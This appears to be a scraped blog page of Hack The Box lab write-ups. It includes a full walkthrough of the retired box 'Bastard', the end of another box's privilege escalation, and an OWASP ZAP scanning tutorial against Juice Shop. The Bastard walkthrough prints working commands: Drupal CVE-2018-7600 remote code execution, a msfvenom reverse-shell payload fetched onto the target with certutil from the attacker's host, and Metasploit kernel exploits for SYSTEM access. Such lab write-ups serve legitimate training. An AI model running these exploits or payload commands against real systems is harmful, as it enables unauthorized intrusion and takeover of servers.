[ +] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[ +] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[ +] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[ * ] Post module execution completed
msf5 post( multi/recon/local_exploit_suggester) >
This time, we can use the kernel exploit “MS14-070”.
msf5 post( multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf5 exploit( windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf5 exploit( windows/local/ms14_070_tcpip_ioctl) > run
[ * ] Started reverse TCP handler on 10.52.0.73:4444
[ * ] Storing the shellcode in memory...
[ * ] Triggering the vulnerability...
[ * ] Checking privileges after exploitation...
[ +] Exploitation successful!
[ * ] Exploit completed, but no session was created.
msf5 exploit( windows/local/ms14_070_tcpip_ioctl) > sessions 1
[ * ] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\S YSTEM
meterpreter >
root.txt is in the directory “C:\Documents and Settings\Administrator\Desktop”.
meterpreter > pwd
C:\D ocuments and Settings\A dministrator\D esktop
meterpreter > cat root.txt
9359e905a2c35f861f6a57cecf28bb7b
meterpreter >
11 Jan 2020
Retired date: 2017/09/17
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Bastard”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.9 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-10 17:29 EET
Nmap scan report for 10.10.10.9
Host is up ( 0.044s latency) .
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 ( http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries ( 15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done : 1 IP address ( 1 host up) scanned in 169.57 seconds
root@kali:~#
2. Getting User
By accessing the web server, we can find the website that Drupal CMS is running.
At first, try to figure out its version, we can see the file “CHANGELOG.txt”.
The version is “Drupal 7.54”
root@kali:~# curl -s http://10.10.10.9/CHANGELOG.txt | head
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines ( API addition:
https://www.drupal.org/node/2826480) .
- Logging of searches can now be disabled ( new option in the administrative
interface) .
- Added menu tree render structure to ( pre-) process hooks for theme_menu_tree()
( API addition: https://www.drupal.org/node/2827134) .
- Added new function for determining whether an HTTPS request is being served
root@kali:~#
Since we found the version of Drupal, take a look at public exploit.
root@kali:~# searchsploit drupal 7
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| ( /usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( Add Admin User) | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( Admin Session) | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( PoC) ( Reset Password) ( 1) | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( PoC) ( Reset Password) ( 2) | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( Remote Code Execution) | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' ( Authenticated) Remote Code ( Metasploit) | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' ( Authenticated) Remote Code Execution ( PoC) | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG ( Drupal 6.x/7.x) - Persistent Cross-Site Scripting | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution ( Metasploit) | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | exploits/php/webapps/44501.txt
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~#
By googling the following keyword, we can find the exploit for “CVE-2018-0762” .
At first, we have to install the prerequisites.
root@kali:~# pip install requests
---
root@kali:~# pip install bs4
---
Then, execute the python script like following.
We got RCE and the username is “iusr”
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9
()
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION ( CVE-2018-7600) |
| by pimps |
=============================================================================
[ * ] Poisoning a form and including it in cache.
[ * ] Poisoned form ID: form-zOmyPneEf5iyoz3yKt8zu5m59kxdtrcNPWZ1eaYNM7s
[ * ] Triggering exploit to execute: whoami
nt authority\i usr
root@kali:~/CVE-2018-7600#
Next, to obtain a reverse shell, generate a payload with msfvenom.
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST = 10.10.14.36 LPORT = 1338 -f exe > shell.exe
[ -] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[ -] No arch selected, selecting arch : x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
root@kali:~#
To upload the payload “shell.exe”, run a web server on the localhost.
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Next, let the server download our “shell.exe” with the following way.
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe" http://10.10.10.9
()
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION ( CVE-2018-7600) |
| by pimps |
=============================================================================
[ * ] Poisoning a form and including it in cache.
[ * ] Poisoned form ID: form-eluco1rRs3Likgl6whfexWXJUfBv18WMnuEcvVUc-hw
[ * ] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
root@kali:~/CVE-2018-7600#
After that, set a handler for the meterpreter shell.
msf5 > use exploit/multi/handler
msf5 exploit( multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit( multi/handler) > set lhost 10.10.14.36
lhost => 10.10.14.36
msf5 exploit( multi/handler) > set lport 1338
lport => 1338
msf5 exploit( multi/handler) > run
Finally, run the following command to execute the remote “shell.exe”
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "shell.exe" http://10.10.10.9
()
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION ( CVE-2018-7600) |
| by pimps |
=============================================================================
[ * ] Poisoning a form and including it in cache.
[ * ] Poisoned form ID: form-3CDbNQWCSlC7U8JT4zNX52Lhbp3Kyc3txDmOtm_2Cxk
[ * ] Triggering exploit to execute: shell.exe
Now we got a reverse shell as a user “authority\isur”.
msf5 exploit( multi/handler) > run
[ * ] Started reverse TCP handler on 10.10.14.36:1338
[ * ] Sending stage ( 206403 bytes) to 10.10.10.9
[ * ] Meterpreter session 1 opened ( 10.10.14.36:1338 -> 10.10.10.9:49242) at 2020-01-11 00:39:37 +0200
meterpreter > getuid
Server username: NT AUTHORITY\I USR
meterpreter >
“user.txt” is in the directory “C:\Users\dimitris\Desktop”.
meterpreter > pwd
C:\u sers\d imitris\d esktop
meterpreter > cat ./user.txt
ba22fde1932d06eb76a163d312f921a2
meterpreter >
3. Getting Root
By running “systeminfo”, we can figure out that this server is Windows Server 2008 without any hotfix.
This means that this OS is fresh install and no update was given.
C:\U sers\A dministrator\D esktop>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 11/1/2020, 1:15:17 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor( s) : 2 Processor( s) Installed.
[ 01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[ 02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\W indows
System Directory: C:\W indows\s ystem32
Boot Device: \D evice\H arddiskVolume1
System Locale: el; Greek
Input Locale: en-us; English ( United States)
Time Zone: ( UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.565 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.578 MB
Virtual Memory: In Use: 517 MB
Page File Location( s) : C:\p agefile.sys
Domain: HTB
Logon Server: N/A
Hotfix( s) : N/A
Network Card( s) : 1 NIC( s) Installed.
[ 01]: Intel( R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address( es)
[ 01]: 10.10.10.9
C:\U sers\A dministrator\D esktop>
This time, “MS15-051” was used to get a SYSTEM shell.
msf5 exploit( multi/handler) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit( windows/local/ms15_051_client_copy_image) > set session 1
session => 1
msf5 exploit( windows/local/ms15_051_client_copy_image) > set target 1
target => 1
msf5 exploit( windows/local/ms15_051_client_copy_image) > set lhost 10.10.14.36
lhost => 10.10.14.36
msf5 exploit( windows/local/ms15_051_client_copy_image) > run
[ * ] Started reverse TCP handler on 10.10.14.36:4444
[ * ] Launching notepad to host the exploit...
[ +] Process 2052 launched.
[ * ] Reflectively injecting the exploit DLL into 2052...
[ * ] Injecting exploit into 2052...
[ * ] Exploit injected. Injecting payload into 2052...
[ * ] Payload injected. Executing exploit...
[ +] Exploit finished, wait for ( hopefully privileged) payload execution to complete.
[ * ] Command shell session 2 opened ( 10.10.14.36:4444 -> 10.10.10.9:49182) at 2020-01-11 01:17:57 +0200
whoami
whoami
nt authority\s ystem
C:\i netpub\d rupal-7.54>
root.txt is in the directory “C:\Users\Administrator\Desktop”.
C:\U sers\A dministrator\D esktop>type root.txt.txt
type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c
C:\U sers\A dministrator\D esktop>
06 Jan 2020
Explanation
OWASP ZAP is a web vulnerability scanner that is one of the OWASP projects.
Environment
OS: Kali linux 2019.4
OWASP ZAP: v2.8.1
Target: OWASP Juice shop v9.3.1
Solution
1. Initial setup
Since it’s in the kali official repository, we need just “apt-get”
root@kali:~# apt-get install zaproxy
Next, launch the target application.
This time, I used OWASP Juice shop with Vagrant and IP “192.168.33.10” was assigned.
root@kali:~# git clone https://github.com/bkimminich/juice-shop.git
---
root@kali:~# cd juice-shop/vagrant/
root@kali:~/juice-shop/vagrant# vagrant up
---
After that give a specific name for OWASP juice shop.
This time, give the following line in “/etc/hosts”.
192.168.33.10 juiceshop
2. Other setup
At first, open the ZAP GUI console.
Go to “Tools” -> “Options” -> “Local Proxies”.
By default, it is configured to use “http://localhost:8080”.
We have to configure the web browser to use a proxy on port 8080.
Then, change the mode to the “Protected mode” not to implement unintended attack.
If we select the “Protected mode”, we have to specify the target URL.
The web browser we use should be Firefox because it does not have any XSS protection.
However, this time, Google Chrome was used.
If the configuration is correct, we can find the target URL in the “Site” section.
This means now we can go to the next step.
Since we’re using protected mode, we have to include the site into the “context”.
We need to right click the site, then go to “Include in Context”.
This time, we don’t have any context so click the “New Context” and we can see this window.
So click “OK”.
After that, we can see that some entries are added to the site.
3. Active scanning
Now we have a target machine.
Try to attack by right clicking the “http://juiceshop” -> “Attack” -> “Active Scan”.
We can confirm that tons of HTTP requests were being sent on the “Active Scan” tab.
After the finishing, we can find some security alerts on the “Alerts” tab
4. Saving the session
We can save the session data by going to “Snapshot Session As…”, we cam save the current session.
5. Generate a report
We can create a report of the each test as HTML or XML file.
Go to “Report” -> “Generate HTML Report…”.
6. Next task
This time, I could not find some vulnerabilities that OWASP juice shop has.
Next time, try to focus on each vulnerability and by customizing policies, achieve this purpose